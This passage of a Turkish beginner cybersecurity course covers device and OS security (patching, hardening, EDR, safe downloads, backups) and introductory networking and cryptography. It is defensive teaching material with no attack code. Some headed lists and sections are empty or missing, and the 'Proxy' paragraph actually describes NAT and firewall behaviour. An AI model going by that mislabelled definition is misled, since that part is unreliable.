Patch (Yama): Üreticinin zafiyetleri kapatmak, hataları gidermek veya iyileştirme sağlamak için yayınladığı düzeltmedir. Saldırganlar çoğu zaman yayımlanan yamaları analiz ederek zafiyetin nerede olduğunu hızlıca çıkarabilir; yamalanmamış sistemler hedef olur. Ofis yazılımında uzaktan kod çalıştırma açığını kapatan güncelleme tipik örnektir; kullanıcı yüklemezse özel hazırlanmış bir belgeyle risk artar. Otomatik güncelleme bildirimleri, yeniden başlat gerekli uyarıları ve kurumsal yamalama takvimleri günlük hayatta sık görülür.

2.3 Yama Yönetimi (Patch Management) Neden Kritik?

OS ve uygulamalara gelen yamaların planlı biçimde uygulanması süreci. “Bilinen zafiyet” penceresi uzadıkça istismar olasılığı artar. Özellikle tarayıcı, ofis yazılımları ve işletim sistemi bileşenleri yüksek önceliklidir. Örneğin Tarayıcınız için gelen güvenlik güncellemesini 2 ay ertelemek; bu süre boyunca zararlı bir web sayfasının eski sürümü hedeflemesi. Günlük hayatta kurumlarda “aylık yama günü”, acil güvenlik yamaları, otomatik güncelleme politikaları.

Başlangıç seviyesi iyi pratikler:

• Otomatik güncellemeleri mümkünse açık tutun (OS + tarayıcı + temel uygulamalar).

• “Büyük sürüm yükseltmesi” ile “güvenlik yamaları”nı ayırın; güvenlik yamaları genellikle daha önceliklidir.

• Kritik hesaplarla kullanılan cihazlarda güncellemeleri ertelemeyi alışkanlık haline getirmeyin.

3) Yetkiler, En Az Ayrıcalık ve Temel OS Kontrolleri

3.1 Kullanıcı Hesapları ve Yönetici Yetkisi

OS içinde her kullanıcı hesabı belirli izinlere sahiptir; yönetici (admin) hesaplar daha geniş yetkilidir. Zararlı bir uygulama veya saldırgan admin yetkisiyle çalışırsa sistemde çok daha derin değişiklik yapabilir. Günlük işler için standart kullanıcı hesabı kullanmak, sadece gerektiğinde yönetici onayı vermek tipik bir uygulamadır. "Bu uygulama değişiklik yapmak istiyor, izin veriyor musunuz?" uyarıları günlük hayatta sık karşılaşılır. Bu kavram, Modül 3'teki en az ayrıcalık ilkesiyle ilişkilidir: Least privilege sadece uygulama/hesap yetkileri değil, cihaz üzerindeki OS yetkileri için de geçerlidir.

3.2 Güvenlik Duvarı (Firewall) Mantığı

Gelen/giden ağ trafiğini kurallara göre izin veren/engelleyen kontrol katmanı. Dışarıdan istenmeyen bağlantı girişimlerini azaltır; gereksiz servislerin görünürlüğünü düşürerek saldırı yüzeyini küçültür. Örneğin Kullanılmayan bir servisin dışarıdan bağlantı kabul etmesini engellemek. Günlük hayatta oS yerleşik güvenlik duvarı ayarları; kurumlarda merkezi firewall’lar.

3.3 Disk Şifreleme (Disk Encryption) ve Cihaz Kaybı

Diskteki verilerin, anahtar olmadan okunamayacak şekilde şifrelenmesi. Cihaz kaybolduğunda/çalındığında verilerin doğrudan okunmasını zorlaştırır; gizliliği korur (CIA’da gizlilik). Örneğin Dizüstü bilgisayar kaybolduğunda disk şifreleme aktifse diski başka cihaza takıp dosyaları okumak çok zorlaşır. Günlük hayatta kurumsal dizüstüler, kişisel bilgisayarlar; telefonlarda varsayılan şifreleme.

4) Güvenli Yapılandırma (Hardening/Sıkılaştırma) ve Saldırı Yüzeyi

4.1 Hardening Nedir?

Sistem ve uygulamaları, gereksiz özellikleri kapatıp güvenli ayarları etkinleştirerek daha dayanıklı hale getirme yaklaşımı. Ne kadar çok gereksiz servis/özellik açıksa saldırı yüzeyi o kadar büyür. Örneğin Kullanılmayan uzaktan erişim özelliğini kapatmak; varsayılan ayarları gözden geçirmek. Günlük hayatta sunucu kurulum kontrol listeleri, güvenli yapılandırma kılavuzları, kurumsal “baseline” ayarları.

Başlangıç seviyesi hardening kontrol başlıkları:

4.2 Saldırı Yüzeyi (Attack Surface) Nedir?

Bir sistemin saldırıya açık olabilecek tüm giriş noktalarının toplamı (açık servisler, eklentiler, yetkiler, gereksiz bileşenler). Daha geniş saldırı yüzeyi, daha fazla deneme fırsatı demektir (riskin olasılık kısmını artırır). Örneğin Kullanılmayan bir dosya paylaşım servisinin açık kalması. Günlük hayatta ev modemlerinde açık yönetim paneli, sunucularda gereksiz servisler, tarayıcıda çok sayıda eklenti.

5) Uç Nokta Güvenliği: Antivirüs, EDR ve Modern Tehditler

5.1 Uç Nokta (Endpoint) Nedir?

Ağa bağlı kullanıcı cihazlarıdır (bilgisayar, telefon, tablet gibi). Saldırıların önemli bir kısmı uç nokta üzerinden başlar; çünkü kullanıcı etkileşimi (indir-çalıştır, linke tıkla) burada gerçekleşir. Örneğin bir çalışanın dizüstü bilgisayarı, e-posta eki açılmasıyla risk altına girebilir. Günlük hayatta kurumsal bilgisayarlar, kişisel telefonlar, uzaktan çalışma cihazları.

5.2 Antivirüs ve EDR: Kavramsal Fark

Antivirüs (geleneksel yaklaşım): Çoğunlukla imza tabanlı çalışır; bilinen zararlıların kalıplarını arar. Bilinen tehditleri hızlıca yakalamada etkilidir. İndirilen bir dosya bilinen zararlı imzayla eşleştiği için engellenebilir. Yerleşik koruma yazılımları ve dosya tarama uyarıları günlük hayatta sık görülür.

EDR (Endpoint Detection and Response): Sadece imzaya bakmaz; davranışları izler, şüpheli etkinlikleri tespit eder ve müdahale süreçlerini destekler. Karmaşık ve sürekli değişen saldırılarda (ör. APT) yalnız imza tabanlı yaklaşım yetersiz kalabilir. Normalde yapmaması gereken bir işlemi yapan uygulamanın davranışının işaretlenmesi tipik örnektir. Kurumsal uç nokta güvenliği çözümleri ve olay müdahale süreçleri günlük hayatta karşılaşılır.

Bu farkı önemli kılan iki kavram:

APT (Advanced Persistent Threat): Hedefli, uzun süreli, gizli kalmaya çalışan gelişmiş saldırı kampanyalarıdır. APT'ler "tek bir dosya" yerine süreç ve davranışlarla ilerleyebilir; bu yüzden davranış analizi değerlidir.

Polimorfizm (Polymorphism): Zararlı yazılımın tespit edilmemek için kod yapısını sürekli değiştirmesidir. İmza tabanlı tespit zorlaşabilir; davranış izleme daha kritik hale gelir.

Trojan, ransomware, spyware gibi türler uç noktada etkisini gösterir; bazıları davranışla yakalanır. Spyware ve tuş kaydedici gibi tehditler, parola/MFA güvenliğini dolaylı zayıflatabilir.

6) Yazılım Güvenliği: Güvenli Edinme, Lisanslı Kullanım ve Tedarik Zinciri Riski

6.1 Güvenli Yazılım Edinme (Trusted Sources)

Yazılımın resmî kaynaklardan (üreticinin sitesi, resmî mağazalar) edinilmesi; mümkünse doğrulama/itibar kontrollerinin yapılması. Sahte kurulum dosyaları, korsan/crack’li yazılımlar ve “paketlenmiş” zararlı yazılımlar, bulaşma için çok yaygın bir yoldur. Örneğin “Ücretsiz premium sürüm” diye sunulan bir kurulum dosyasını rastgele bir siteden indirip çalıştırmak. Günlük hayatta sahte indirme butonları, üçüncü taraf kurulum yöneticileri, korsan yazılım siteleri.

Başlangıç seviyesi kurallar:

• Resmî kaynak dışı indirmelere temkinli yaklaşın.

• “Crack”, “keygen”, “patch” vaatleri yüksek risk taşır.

• Kurulum sırasında istenen izinleri okuyun; gereksiz izinleri sorgulayın.

6.2 Lisanslı Yazılım Kullanmanın Güvenliğe Etkisi

Lisanslı yazılım, yazılımın yasal ve resmî dağıtım kanalıyla edinilmesi ve güncelleme mekanizmalarının bozulmamış olmasıdır. Korsan ve crack'li yazılımlar çoğu zaman Truva Atı (Trojan) veya backdoor (arka kapı) taşıyabilir. Ücretli bir yazılımın "ücretsiz hale getirilmiş" sürümünün arka planda yetkisiz bağlantılar kurması tipik örnektir. Crack'li paketler, modifiye kurulum dosyaları ve şüpheli aktivasyon araçları günlük hayatta sık karşılaşılan risklerdir.

6.3 Tedarik Zinciri (Supply Chain) Riski

Güvenilir görünen bir yazılımın güncelleme mekanizması, bağımlılıkları veya dağıtım süreci üzerinden zarar görmesi/istismar edilmesi riski. Güvenilir görülen kanallar üzerinden geniş ölçekte etki yaratılabilir; özellikle eklentiler ve otomatik güncellemeler kritik olabilir. Örneğin Popüler bir eklentinin güncellemesinin ele geçirilip kötü amaçlı kod dağıtması. Günlük hayatta paket yöneticileri, eklenti mağazaları, otomatik güncelleme sistemleri.

7) İnternet ve Web Güvenliği: HTTP–HTTPS, SSL/TLS ve Güvenli Sörf

7.1 HTTP ve HTTPS Arasındaki Temel Fark

HTTP (HyperText Transfer Protocol), verilerin ağ üzerinde düz metin olarak iletilebildiği web iletişim protokolüdür. HTTPS (HTTP Secure) ise HTTP'nin iletişimi SSL/TLS ile şifreleyerek korunan sürümüdür. HTTPS, verinin gizliliğini ve bütünlüğünü destekler: araya giren biri veriyi okuyamaz ve doğru kurulumla yolda değiştirmek zorlaşır. Açık bir Wi-Fi'da HTTP ile giriş yapılan bir sayfada verilerin okunabilmesi riski vardır; HTTPS ile bu risk azalır. Adres çubuğunda "https://" ve kilit simgesi, sertifika uyarıları günlük hayatta sık karşılaşılan göstergelerdir.

7.2 SSL/TLS Nedir?

SSL/TLS, internet üzerindeki iletişimi şifreleyerek koruyan güvenlik protokolleridir; güncel kullanımda TLS temel kavramdır. Kimlik bilgileri ve hassas veriler aktarılırken gizlilik ve bütünlük korunur. Bir alışveriş sitesinde ödeme adımında TLS ile şifreli bağlantı kurulması tipik bir örnektir. HTTPS bağlantıları, güvenli API çağrıları ve uygulama içi güvenli bağlantılar günlük hayatta sık karşılaşılan kullanımlardır. Bir sonraki modülde ağ temellerini işlerken "güvenli bağlantı" kavramını daha sistematik ele alacak; TLS'in neden kritik olduğuna daha güçlü bir bağ kuracaksınız.

8) Çerezler (Cookies), Dijital Ayak İzi ve Tarayıcı Hijyeni

8.1 Çerez (Cookie) Nedir?

Web sitelerinin tarayıcıya kaydettiği küçük veri dosyalarıdır; oturum ve tercih bilgilerini tutabilir. Oturum yönetimini kolaylaştırır; fakat takip (tracking) amaçlı da kullanılabilir ve gizlilik riskleri doğurabilir. Örneğin Siteye tekrar girdiğinizde “beni hatırla” seçeneğinin çalışması. Günlük hayatta giriş oturumları, sepet bilgisi, kişiselleştirilmiş içerikler, reklam takibi.

8.2 Dijital Ayak İzi (Digital Footprint) Nedir?

Dijital ayak izi, internette yapılan işlemler sonucu oluşan izlerdir: aramalar, ziyaretler, beğeniler, paylaşımlar, profil bilgileri bu izlere dahildir. Toplanan bilgiler hedefli reklam kadar hedefli sosyal mühendislik için de "keşif materyali" olabilir. Sosyal medya paylaşımlarından ilgi alanlarının çıkarılması ve buna göre ikna edici sahte mesaj hazırlanması tipik bir örnektir. Reklam profilleme, veri aracılığı ve kimlik avı kampanyalarının kişiselleştirilmesi günlük hayatta sık karşılaşılan durumlardır. Bu kavram önceki bölümdeki sosyal mühendislikle ilişkilidir (Modül 2): sosyal mühendislik çoğu zaman önceden toplanmış bilgilerle daha inandırıcı hale gelir.

Dijital ayak izini yönetmek için temel alışkanlıklar:

• Çerez/izleyici ayarlarını gözden geçirmek ve gereksiz izinleri kısıtlamak

• Tarayıcıda gereksiz eklentileri kaldırmak

• Paylaşılan kişisel bilgileri asgari düzeyde tutmak

• Şüpheli linklere tıklamadan önce bağlamı doğrulamak

9) Tarayıcı Güvenliği: Sertifikalar, Eklentiler, İndirmeler

9.1 Sertifika Uyarıları (Certificate Warnings) Nasıl Yorumlanır?

Tarayıcı, bağlantının güvenilirliğinde problem algılarsa “bağlantınız gizli değil” gibi uyarılar gösterir. Sahte siteler veya araya girme girişimleri için bir sinyal olabilir. Örneğin Giriş yapılacak sayfada sertifika uyarısı varsa durup doğrulama yapmak. Günlük hayatta giriş ekranları, ödeme sayfaları, kamu hizmeti portalları.

9.2 Tarayıcı Eklentileri ve İzinler

Eklentiler tarayıcıya ek özellik kazandırır; bazıları sayfa içeriğini okuma/değiştirme iznine sahip olabilir. Kötü niyetli veya aşırı izinli eklentiler, girilen verileri okuyabilir; tedarik zinciri saldırılarıyla popüler eklentiler ele geçirilip geniş kitle etkilenebilir. Örneğin “Ziyaret ettiğiniz tüm sitelerdeki verileri okuma” izni isteyen eklentiyi kaldırmak veya yalnız gerekli sitelerle sınırlandırmak. Günlük hayatta reklam engelleyiciler, parola yöneticisi eklentileri, ekran görüntüsü araçları.

Başlangıç seviyesi eklenti kuralları:

• Az sayıda, gerçekten gerekli eklenti kullanın.

• İzinleri okuyun: “Neden bu izne ihtiyaç duyuyor?” diye sorgulayın.

• Kullanmadığınız eklentileri kaldırın.

9.3 Güvenli İndirme ve Dosya Çalıştırma Alışkanlıkları

İnternetten indirilen dosyalar zararlı yazılım taşıyabilir; özellikle çalıştırılabilir dosyalar yüksek risklidir. Bulaşmaların büyük kısmı “indir-çalıştır” davranışıyla başlar. Örneğin “fatura.pdf.exe” benzeri şüpheli dosyayı açmamak; dosya uzantılarına dikkat etmek. Günlük hayatta e-posta ekleri, mesajlaşma uygulamaları, sahte indirme sayfaları.

10) Ek Savunma Katmanı: Yedekleme ve İzole Çalıştırma Yaklaşımı

10.1 Yedekleme (Backup) Neden Sadece “Kopya” Değildir?

Verilerin düzenli olarak ayrı bir ortamda saklanması; gerektiğinde geri dönebilmeyi sağlayan süreç. Fidye yazılımı gibi erişilebilirliği hedefleyen tehditlerde hizmet sürekliliğini artırır. Örneğin Önemli belgelerin haftalık yedeklenmesi; sorun olduğunda önceki sürüme dönebilmek. Günlük hayatta harici disk yedekleri, bulut yedekleme servisleri, kurumsal yedekleme politikaları.

10.2 Sandbox (Kum Havuzu) Yaklaşımı

Şüpheli bir yazılımı izole bir ortamda çalıştırarak sistemin geri kalanını riske atmadan davranışını gözlemleme yaklaşımı. Ana sistemi riske atmadan inceleme ve değerlendirme yapılabilir (kurumsal ortamlarda daha yaygındır). Örneğin Şüpheli bir dosyanın ana cihazda değil, izole ortamda değerlendirilmesi. Günlük hayatta güvenlik analiz süreçleri, kurum içi test ortamları.

11) Kavramsal Senaryo Çözümleme (Teorik)

Bu bölüm “nasıl saldırı yapılır” anlatmaz; olayları doğru sınıflandırmayı öğretir. Bu yaklaşım, Modül 1’deki risk düşüncesini ve Modül 2’deki saldırı türlerini pratikte birleştirir.

Senaryo şablonu (Modül 1–2–3 ile uyumlu):

• Varlık: Veri mi, sistem mi, hizmet mi?

• Zafiyet: Güncelleme eksikliği mi, yanlış yapılandırma mı, kullanıcı hatası mı, aşırı yetki mi?

• Yöntem: Phishing mi, malware mı, bilinen zafiyetten yararlanma mı (kavramsal)?

• Etki (CIA): Gizlilik/bütünlük/erişilebilirlik hangisi etkilendi?

• Asgari önlem: Hangi temel kontrol(ler) riski düşürür?

Mini Senaryo 1

Bir kullanıcı, tarayıcıda “güncelleme gerekli” uyarısı veren bir sayfadan dosya indiriyor. Dosyayı çalıştırdıktan sonra bilgisayar yavaşlıyor ve bazı dosyalarına erişemediğini fark ediyor.

• Varlık: Cihaz ve dosyalar

• Zafiyet: Güvenli edinme/hijyen eksikliği; şüpheli indirmenin çalıştırılması

• Yöntem: Sosyal mühendislik + zararlı yazılım bulaşması (kavramsal)

• Etki (CIA): Erişilebilirlik (dosyalara erişememe), ayrıca gizlilik riski

• Asgari önlem: Resmî kaynaklardan yazılım edinme, OS/tarayıcı güncelleme, uç nokta koruması, yedekleme

Mini Senaryo 2

Bir bilgisayarda uzun süredir sistem güncellemesi yapılmıyor. Kullanıcı, sık kullandığı bir programı açtığında programın çökmesi ve beklenmeyen hatalar artıyor.

• Varlık: Sistem kararlılığı ve hizmet sürekliliği

• Zafiyet: Patch eksikliği / güncelleme gecikmesi

• Yöntem: Doğrudan saldırı olmak zorunda değil; “bilinen zafiyet” riski ve stabilite sorunları

• Etki (CIA): Erişilebilirlik (sistem/uygulama kullanılamaz hale gelebilir)

• Asgari önlem: Düzenli güncelleme takvimi, kritik yamaları önceliklendirme

Mini Senaryo 3

Bir kullanıcı, e-posta ile gelen “belgeyi görüntülemek için açın” mesajındaki eki indiriyor. Ek, güncellenmemiş bir uygulamadaki zafiyeti tetikleyerek istenmeyen bir davranışa neden oluyor.

• Varlık: Cihaz ve kullanıcı verileri

• Zafiyet: Güncellenmemiş uygulama (zafiyet) + riskli ek açma alışkanlığı

• Yöntem: Zafiyetin istismar edilmesi (kavramsal exploit kullanımı)

• Etki (CIA): Gizlilik ve bütünlük riski; bazı durumlarda erişilebilirlik riski

• Asgari önlem: Uygulama/OS yamaları, ek/indirme hijyeni, uç nokta koruması

• Bir sonraki modülde bu senaryolardaki “bağlantı ve ağ ortamı” boyutunu (güvensiz Wi-Fi, güvenli bağlantı, temel ağ kontrolleri) sistematik şekilde ele alacaksınız.

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• İşletim sisteminin dijital varlıklar için temel güven katmanı olduğunu ve güvenliğin burada başladığını öğrendik.

• Bug → zafiyet → exploit → patch zincirini kurarak, yama yönetiminin neden kritik olduğunu kavradık.

• Sıkılaştırma (hardening) ve saldırı yüzeyi kavramlarıyla, gereksiz bileşenlerin riski nasıl artırdığını gördük.

• En az ayrıcalık, güvenlik duvarı ve disk şifreleme gibi temel OS kontrollerinin gizlilik, bütünlük ve erişilebilirliği nasıl desteklediğini ilişkilendirdik.

• Uç nokta güvenliğinde antivirüs ile EDR’in yaklaşım farklarını; APT ve polimorfizm gibi modern tehditlerin bu farkı neden önemli kıldığını değerlendirdik.

• Yazılımı güvenli kaynaklardan edinmenin, lisanslı kullanımın ve tedarik zinciri risklerinin pratik sonuçlarını analiz ettik.

• HTTP–HTTPS farkını, SSL/TLS’in şifreli iletişimdeki rolünü ve sertifika uyarılarını doğru yorumlamanın önemini öğrendik.

• Çerezler, dijital ayak izi, tarayıcı eklentileri ve güvenli indirme alışkanlıklarıyla internet/tarayıcı güvenliğini günlük pratiklere dönüştürdük.

• Yedekleme ve izole değerlendirme (sandbox) yaklaşımının olaylara karşı dayanıklılık sağladığını kavradık.

Modül 5 — Ağ Güvenliğinin Temelleri ve Veri Koruma Mekanizmaları (IP, DNS, Güvenli Bağlantı, Temel Ağ Kontrolleri ve Kriptografiye Giriş)

Önceki modüllerde (Modül 3 ve 4) hesaplarınızı, cihazınızı ve yazılımlarınızı daha güvenli hale getirmenin temel prensiplerini öğrendiniz. Bu modül, aynı güvenlik yaklaşımını ağ katmanına taşıyarak “veri bir noktadan diğerine giderken” neler olduğuna odaklanır: IP adresleme, portlar, protokoller ve DNS gibi temel kavramlar; Wi-Fi güvenliği, VPN ve proxy gibi güvenli bağlantı yaklaşımları; firewall, NAT ve ağ ayrıştırma gibi temel ağ kontrolleri ele alınır. Ayrıca verinin gizliliğini ve bütünlüğünü destekleyen kriptografik temeller (şifreleme, anahtarlar, hash, salt) başlangıç seviyesinde, bol örnekle açıklanır. Bir sonraki modülde, bu ağ temellerini kullanarak izleme, loglama ve olay yönetimi gibi daha sistematik tespit/müdahale düşüncesine geçerken bu konuların neden kritik olduğunu göreceksiniz.

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• IP adresi, alt ağ (subnet/CIDR), port, protokol ve DNS kavramlarını açıklayabilir ve aralarındaki ilişkiyi kurabilir.

• Modem, router ve switch gibi temel ağ bileşenlerinin işlevlerini ve güvenlikteki rollerini tanımlayabilir.

• Firewall, NAT ve ağ ayrıştırma (segmentation/misafir ağı) kontrollerinin saldırı yüzeyi ve risk üzerindeki etkisini yorumlayabilir.

• Wi-Fi güvenliği (WPA2/WPA3), güvenli bağlantı alışkanlıkları, VPN ve proxy’nin kavramsal amaçlarını ve sınırlarını analiz edebilir.

• Kriptografinin temel kavramlarını (plaintext, ciphertext, key), simetrik/asimetrik şifreleme farklarını ve hash/salt’ın bütünlük ile parola güvenliğindeki rolünü açıklayabilir.

Ağ Güvenliği ve Kriptografi Temelleri

1) Büyük Resim: Neden Ağ + Veri Güvenliği?

Ağ güvenliği, verinin ağ üzerinde taşınırken yetkisiz erişime, değişikliğe veya hizmet kesintisine uğramasını önlemeye yönelik yaklaşımların bütünüdür. Modül 1'deki CIA üçlüsü (Gizlilik, Bütünlük, Erişilebilirlik) ağ üzerinde uygulamaya dönüşür. Ağ zayıfsa, Modül 3'teki güçlü kimlik doğrulama ve Modül 4'teki güncel cihazlar bile risk altında kalabilir. Güncel bir bilgisayarınız olsa bile, hatalı yapılandırılmış bir Wi-Fi ağı üzerinden kritik bir hesaba giriş yapmanız risk doğurabilir. Ev ağları, kampüs ağları, ofis ağları, otel ve kafe Wi-Fi'ları, mobil veri ve uzaktan çalışma senaryoları günlük hayatta sık karşılaşılan örneklerdir.

Dikkat (katmanlı savunma): “Güçlü parola + güncel cihaz = tamamen güvendeyim” düşüncesi yanıltıcıdır. Ağ, saldırganın görünürlük kazandığı ve yanlış yapılandırmaların büyüyebildiği bir katmandır. Bu kavram, önceki modüllerdeki risk (Modül 1) ve saldırı türleri (Modül 2) ile doğrudan ilişkilidir.

2) Ağın Temel Yapı Taşları: IP, Subnet, Port, Protokol

2.1 IP Adresi (IPv4/IPv6)

IP adresi, ağ üzerindeki cihazların birbirini bulabilmesi için kullanılan adresleme sistemidir. Bu nedenle önemlidir: ağ trafiğinde “kimden kime?” sorusunun temel cevabıdır; log inceleme, erişim kontrolü ve olay analizi için ana veridir. Günlük bir örnek olarak, tarayıcınızla example.com’a girdiğinizde cihazınız bir ip hedefiyle iletişim kurar. Gerçek hayatta bu durum modem arayüzleri, firewall kuralları, sunucu logları, ağ izleme ekranları.

Dokümantasyon amaçlı örnek IP blokları (bu modülde kullanılan tek örnek bloklar):

• 192.0.2.0/24

• 198.51.100.0/24

• 203.0.113.0/24

• 2001:db8::/32

2.2 Alt Ağ (Subnet) ve CIDR Gösterimi

Subnet, IP adreslerini mantıksal gruplara bölme yöntemidir. CIDR (örn. /24) ağın büyüklüğünü belirtir. Ağları bölmek yönetimi kolaylaştırır ve güvenlikte ayrıştırma için temel oluşturur: “Her şey her şeye erişmesin.” Örneğin 192.0.2.0/24, bir yerel ağ bloğunu temsil eder; aynı segmentteki cihazlar gibi düşünülebilir. Günlük hayatta kurumsal ağ tasarımı, bulut ağları, yönlendirici/router ayarları.

2.3 Port

Port, aynı IP üzerindeki farklı hizmetleri ayırt eden numaralı “kapılar”dır. IP “bina adresi”, port “daire numarası” gibidir. Bu nedenle önemlidir: açık portlar saldırı yüzeyini büyütür; firewall kurallarının önemli kısmı port temellidir. Günlük bir örnek olarak, aynı sunucuda web hizmeti ve başka bir hizmet farklı portlarda çalışabilir. Gerçek hayatta bu durum sunucularda “açık port” listeleri, güvenlik duvarı kural setleri, loglarda hedef port bilgisi.

2.4 Protokoller: TCP ve UDP

Protokol, cihazların veri alışverişini hangi kurallarla yapacağını tanımlar. Bu nedenle önemlidir: farklı protokoller farklı davranışlar ve riskler doğurur; izleme ve olay analizinde “trafik tipi” ayırt edici ipucu sağlar. Günlük bir örnek olarak, tcp “garantili teslim”, udp “hızlı ama garantisiz” gibi düşünülebilir. Gerçek hayatta bu durum web, e-posta, dns sorguları, görüntülü görüşme, oyun trafiği.

• TCP (Transmission Control Protocol)

  Bağlantı kurar, paket sırasını korur, kayıpları telafi eder. Oturum tabanlı ve güvenilir iletişim için yaygındır.

  • Basit örnek: Dosya indirirken verinin eksiksiz gelmesi.

  • Gerçek hayatta: Web oturumları, e-posta aktarımı, bazı dosya transferleri.

• UDP (User Datagram Protocol)

  Bağlantısız, hız odaklıdır; teslim garantisi yoktur. Düşük gecikme gereken uygulamalar için uygundur; bazı kötüye kullanım senaryolarında takip/filtreleme yaklaşımı farklılaşır.

  • Basit örnek: Canlı ses/görüntü aktarımında küçük kayıpların tolere edilmesi.

  • Gerçek hayatta: VoIP, online oyunlar, bazı DNS trafiği.

Bir sonraki modülde log okurken “TCP mi UDP mi?” ayrımı, olayın doğasını anlamada sık kullanılan bir sınıflandırmadır.

3) DNS: İnternetin “Adres Defteri” ve Güvenlik Boyutu

3.1 DNS (Domain Name System)

DNS, alan adlarını (example.com) IP adreslerine çeviren sistemdir. Bu nedenle önemlidir: yanlış yönlendirme kullanıcıyı sahte/hedef dışı bir noktaya götürebilir; bu da kimlik avı (modül 2) ve hesap güvenliği (modül 3) riskini büyütebilir. Günlük bir örnek olarak, tarayıcıya example.com yazınca cihaz dns’e sorar, bir ip döner ve bağlantı o hedefe kurulur. Gerçek hayatta bu durum ev modemleri, kurumsal dns sunucuları, cihaz ağ ayarları.

3.2 DNS Neden Risk Üretebilir?

DNS “nereye gideceğini” belirlediği için, hatalı veya kötü niyetli çözümleme yanlış hedefe yönlendirebilir. Bu nedenle önemlidir: kullanıcı doğru siteye girdiğini sanırken farklı bir noktaya gidebilir; bu durum, modül 4’teki tarayıcı uyarıları ve güvenli kullanım alışkanlıklarını kritik hale getirir. Günlük bir örnek olarak, bir kullanıcı, alışık olduğu giriş sayfasına gittiğini sanır; fakat dns çözümlemesi farklı bir ip’ye yönlendirmiştir. Gerçek hayatta bu durum güvensiz wi-fi ağları, yanlış yapılandırılmış modemler.

4) Ağ Bileşenleri: Modem, Router, Switch ve Paket Mantığı

4.1 Veri Paketleri ve Temel Cihazlar

Veri ağ üzerinde çoğunlukla paketler halinde taşınır; bu paketleri yöneten cihazların güvenlikte rolü vardır. Ağ cihazları “dış dünyaya açılan kapı” ve “trafik kontrol noktaları”dır. Yanlış yapılandırma risk doğurur (Modül 1’in risk yaklaşımıyla ilişkilidir). Örneğin ev ağında telefon, bilgisayar ve TV aynı ağda paket alışverişi yapar. Günlük hayatta ev/işyeri ağları, kampüsler, şirket ağları.

• Modem

  İnternet servis sağlayıcısından gelen sinyali dijital veriye dönüştürerek dış dünyaya açılan ilk kapıyı oluşturur. Dış bağlantının geçtiği yer olduğu için güncel ve güvenli yönetilmelidir (Modül 4’teki güncelleme prensibiyle aynı mantık).

  • Basit örnek: Modem arayüzüne girip yönetici parolasını değiştirmek.

  • Gerçek hayatta: Ev interneti, küçük ofisler.

• Router (Yönlendirici)

  Farklı ağlar arasındaki trafiği yönetir; IP’leri kullanarak doğru hedefe yönlendirir. Çoğu router temel güvenlik özellikleri (filtreleme, NAT, misafir ağı) sunar; yanlış ayar risk üretir.

  • Basit örnek: Misafir ağını ayrı bir segmentte tutmak.

  • Gerçek hayatta: Ev router’ları, ofis ağ geçitleri.

• Switch

  Yerel ağ (LAN) içindeki cihazlar arasında trafiği dağıtır. Yerel ağ trafiğinin düzeni ve ayrıştırma tasarımlarında kritik rol alır.

  • Basit örnek: Ofiste aynı katta çalışan bilgisayarların aynı switch’e bağlı olması.

  • Gerçek hayatta: Ofis ağları, laboratuvarlar, kampüs altyapısı.

5) Güvenli Bağlantı Pratikleri: Wi-Fi, VPN ve Proxy

5.1 Wi-Fi Güvenliği (WPA2/WPA3, Misafir Ağı)

WPA2/WPA3, kablosuz ağda şifreleme ve kimlik doğrulama sağlayan standartlardır. Bu nedenle önemlidir: kablosuz iletişim “ortama yayılır”; zayıf yapılandırma yetkisiz erişim ve veri riski doğurabilir. Günlük bir örnek olarak, ev ağında wpa3 kullanmak, misafirleri misafir ağına almak. Gerçek hayatta bu durum ev/işyeri modem ayarları, kampüs ağları, oteller.

Başlangıç seviyesi iyi pratikler:

5.2 VPN (Virtual Private Network)

VPN, cihaz ile VPN sunucusu arasında trafiği taşıyan şifreli bir tünel oluşturma yaklaşımıdır. Güvenilir olmayan ağlarda (ör. kalabalık bir mekân Wi-Fi’ı) trafiğin belirli bölümünü daha korumalı taşımaya yardımcı olabilir. Örneğin Açık Wi-Fi’da çalışırken kurumsal kaynaklara erişmeden önce VPN’e bağlanmak. Günlük hayatta Uzaktan çalışma, kurumsal sistemlere erişim, seyahat senaryoları.

İpucu (sınırlar): VPN, web sitelerine karşı IP’nizi maskeleyebilir ve cihaz-VPN sunucusu arasını şifreler; ancak tam anonimlik garantisi vermez. VPN sağlayıcısı bazı trafik/metadata bilgilerini görebilir ve güven, politika ve yapılandırma önemlidir.
Bu nokta, Modül 4’teki “uç nokta enfekteyse VPN her şeyi çözmez” ve Modül 3’teki “kimlik bilgisi sahte sayfaya girildiyse zarar oluşur” ilkeleriyle birebir bağlantılıdır.

5.3 Proxy

Proxy, kullanıcı ile internet arasında aracı sunucu gibi çalışır; isteği kullanıcı adına iletir ve yanıtı geri taşır. İstenmeyen trafik akışını durdurarak saldırı yüzeyini azaltır; Modül 2’deki saldırganların “ağ üzerinden deneme” fırsatlarını sınırlandırır. Örneğin Evdeki birçok cihazın internet çıkışında tek dış IP ile görünmesi. Günlük hayatta Ev modemleri, kurumsal ağ geçitleri.

6.3 Ağ Ayrıştırma (Segmentation) ve Misafir Ağı

Ağ ayrıştırma, ağı bölümlere ayırıp bu bölümler arası erişimi kurallarla sınırlamaktır. Bu nedenle önemlidir: bir bölümde sorun çıksa bile diğer bölümlere yayılmayı zorlaştırır; riskin “etki” kısmını düşürür (modül 1 ile ilişkili). Günlük bir örnek olarak, akıllı ev cihazlarını ayrı ağda, iş bilgisayarını ayrı ağda tutmak; misafirleri misafir ağına almak. Gerçek hayatta bu durum vlan yapıları, iot ağı, misafir ağı, sunucu segmentleri.

Bir sonraki modülde olay analizinde “hangi segmentten geldi?” sorusu, olayın kapsamını anlamada temel sorulardan biri olacak.

7) Kriptografiye Giriş: Veriyi Gizli ve Değişmez Tutmak

Bu bölüm saldırı öğretmez; veriyi korumanın mantığını öğretir. Modül 1’deki gizlilik ve bütünlük ilkelerini teknik mekanizmalara bağlar.

7.1 Şifreleme Temelleri (Plaintext, Ciphertext, Key)

• Plaintext (Düz metin): Okunabilir ham veri.

• Ciphertext (Şifreli metin): Şifreleme sonrası anlamsız görünen veri.

• Key (Anahtar): Şifreleme/çözme için gereken gizli bilgi.

